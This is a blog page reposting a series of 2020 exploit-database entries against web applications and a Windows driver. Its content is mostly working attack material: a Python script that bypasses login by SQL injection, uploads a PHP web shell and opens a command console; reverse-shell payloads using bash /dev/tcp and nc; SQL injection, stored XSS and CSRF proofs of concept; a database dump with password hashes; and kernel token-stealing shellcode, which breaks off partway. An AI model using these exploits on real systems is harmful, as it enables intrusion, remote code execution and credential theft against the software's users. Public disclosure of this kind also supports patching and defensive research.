# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren 'Aporlorxl23' Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Linux - XAMPP Server
# CVE : N/A
# Vulnerable Source Code:
# /view_prod.php
# [3] $qry = $conn->query("SELECT * FROM product_list where id =
".$_GET['id'])->fetch_array();
# PoC:
# Request:
GET /view_prod.php?id=' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
# Response:
HTTP/1.1 200 OK
Date: Tue, 22 Sep 2020 20:44:48 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11
Perl/v5.30.3
X-Powered-By: PHP/7.4.7
Content-Length: 234
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught Error: Call to a member function
fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3
Stack trace:
#0 {main}
thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br />
# As You Can See Here PHP Fatal Error Because
# $qry = $conn->query("SELECT * FROM product_list where id =
"')->fetch_array();
# id Value ' This is Wrong Syntax.
# Recommended Fix:
You Will Use `mysqli_real_escape_string` On id . And query Will Same With :
$qry = $conn->query('SELECT * FROM product_list where id
="$_GET['id']"')->fetch_array();
Because Here Not Used "" This is Imported.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863164446
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A
# Setup: pip3 install bs4 .
# Exploit Code :
import requests,sys,string,random
from bs4 import BeautifulSoup
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"
def Help():
print("[?] Usage: python AporlorRCE.py <Domain>")
def Upload():
session = requests.session()
burp0_url = Domain+"/admin/ajax.php?action=save_menu"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
try:
Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
if Resp == "1":
print("[+] Shell Upload Success")
else:
print("[-] Shell Upload Failed")
except:
print("[-] Request Failed")
Help()
def Login():
burp0_url = Domain+"/admin/ajax.php?action=login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
try:
Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
if Resp.text == "1":
print("[+] Login Success")
else:
print("[+] Login Failed")
except:
print("[-] Request Failed")
Help()
def FoundMyRCE():
global FileName
burp0_url = Domain+"/admin/index.php?page=menu"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
try:
Resp = session.get(burp0_url, headers=burp0_headers)
Soup = BeautifulSoup(Resp.text, "html5lib")
Data = Soup.find_all("img")
for MyRCE in Data:
if RandomFileName in MyRCE["src"]:
FileName = MyRCE["src"].strip("../assets/img/")
print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
except:
print("[-] Request Failed")
Help()
def Terminal():
while True:
Command = input("Console: ")
burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
try:
Resp = session.get(burp0_url)
print(Resp.text)
except KeyboardInterrupt:
print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
except:
print("[-] Request Error")
if __name__ == "__main__":
if len(sys.argv) == 2:
Domain = sys.argv[1]
Login()
Upload()
FoundMyRCE()
Terminal()
else:
Help()
# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/admin/
2- Login to admin panel.
3- Press "Posts" button.
4- Write XSS Payload into the description of the post.
5- Press "Save" button.
6- Go to the post.
XSS Payload ==> "><script>alert("XSS")</script>
==> HTTP Request <==
POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close
token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10
&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
# Google Dork: " BigTree CMS "
# Date: 2020-25-09
# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/
# Version: 4.4.10
# Tested on: Windows
# CVE : N/A
## 1. Authenticated Remote Code Execution
# Attack type: Remote
# Impact: Remote arbitrary code execution
# Affected component(s): /core/admin/field-types/list/draw.php
# Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function:
# Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE).
# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
# POC: Developer create setting and code will be executed when load settings:
POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Origin: http://xxxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
Upgrade-Insecure-Requests: 1
__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>
# Video: https://vimeo.com/461667065
## 2. Authenticated SQL Injection
# Attack type: Remote
#Impact: Authenticated SQl Injection in BigTree CMS
# Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via crete new feed function:
# Affected component(s): /core/feeds/custom.php
# Description:BigTree 4.4.10 and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query.
# Severity (CVSS 3.1): Base Score: 7.2 HIGH
# POC: Request create or edit feed:
POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Origin: http://xxxx
Connection: close
Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
Cookie: yyyy
__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12
# Video: https://vimeo.com/461667107
## 3. Authenticated Stored Cross-Site Scripting
# Attack type: Remote
# Impact: Stored XSS
# Affected component(s): site/index.php/admin/pages/update
# Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function:
# Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update
# Severity (CVSS 3): Base Score: 6.5 MEDIUM
# POC: Request create or edit page:
POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
Content-Length: 12173
Origin: http://xxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
Cookie: yyyy
---some fields here---
<p> <span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
-----------------------------2320192840320212926996245368
---some fields here---
# Video: https://vimeo.com/461667129
# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.8.9
# CVE : CVE-2020-15922
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import argparse
import base64
import random
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def print_disclaimer():
print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
4) The author is not responsible for any possible harm caused by this
material.
---------------------""")
def print_info():
print("""
[*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922)
[*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php -
Reverse Shell
./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP
rev-PORT """)
def run_cmd(url,ip,port):
rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port)
print("[+] Reverse shell: {0}".format(rev_shell))
data = {
"submit":"True",
"ipaddress0":"; {0}".format(rev_shell),
"netmask0":"",
"gateway0":"",
"dns1":"",
"dns2":""
}
# exec rev shell
print("[*] Starting reverse shell to {0} {1}...".format(ip,port))
try:
r = requests.post(url,data=data,verify=False,timeout=1)
except requests.exceptions.ReadTimeout:
print("[?] ...check if it worked")
pass
def main():
print_info()
print_disclaimer()
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str,
help="the complete target URL")
parser.add_argument("ip", type=str,
help="the ip address for reverse shell")
parser.add_argument("port", type=str,
help="the port for reverse shell")
args = parser.parse_args()
run_cmd(args.target, args.ip, args.port)
if __name__ == '__main__':
main()
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
# Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
B-swiss 3 Digital Signage System 3.6.5 Database Disclosure
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application is vulnerable to unauthenticated database download
and information disclosure vulnerability. This can enable the attacker to
disclose sensitive information resulting in authentication bypass, session
hijacking and full system control.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5588
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php
13.06.2020
--
$ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4
INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
(1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
<!--
B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5589
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
13.06.2020
-->
<html>
<body>
<h1>CSRF Add b-swiss Maintenance Admin</h1>
<script>
function GodMode()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"locator\"\r\n" +
"\r\n" +
"Users.Save\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"page\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"sort\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"inpopup\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rowid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
"\r\n" +
"TestingusF\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
"\r\n" +
"TestingusL\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_email\"\r\n" +
"\r\n" +
"aa@bb.cc\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_username\"\r\n" +
"\r\n" +
"testingus\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_password\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
"\r\n" +
"100000\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_status\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_language\"\r\n" +
"\r\n" +
"french-sw\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Press me" onclick="GodMode();" />
</form>
</body>
</html>
# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-01
# Exploit Author: nepska
# Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org
# Software Link: https://github.com/ammarfaizi2/latex.teainside.org
# Version: v1.0
# Tested on: Kali linux / Windows 10
# CVE: N/A
# Header Requests
POST /api.php?action=tex2png HTTP/1.1
Host: latex.teainside.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Origin: https://latex.teainside.org
DNT: 1
Connection: keep-alive
Referer: https://latex.teainside.org/
Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403
{"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"}
# Payload
\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}
# Attacker
nc -lvp 1234
/*
Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
Date: 2020-09-24
Exploit Author: Matteo Malvica
Vendor Homepage: https://www.msi.com
Software Link: https://msi.gm/ABLTMNB
Driver: MSIO64.sys
SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD
Version: 1.0.0.8
Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]
MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation
CVE: CVE-2020-17382
Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/
Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities
*/
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#pragma warning( disable : 6387 )
VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {
// SHELLCODE FOR 1709
BYTE token_steal[] =
"\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR
"\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess)
"\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head
"\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list
//find_system_proc:
"\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId
"\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process
"\x74\x05" // jz found_system ; Found SYSTEM token
"\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer
"\xEB\xF1" // jmp find_system_proc ; Loop
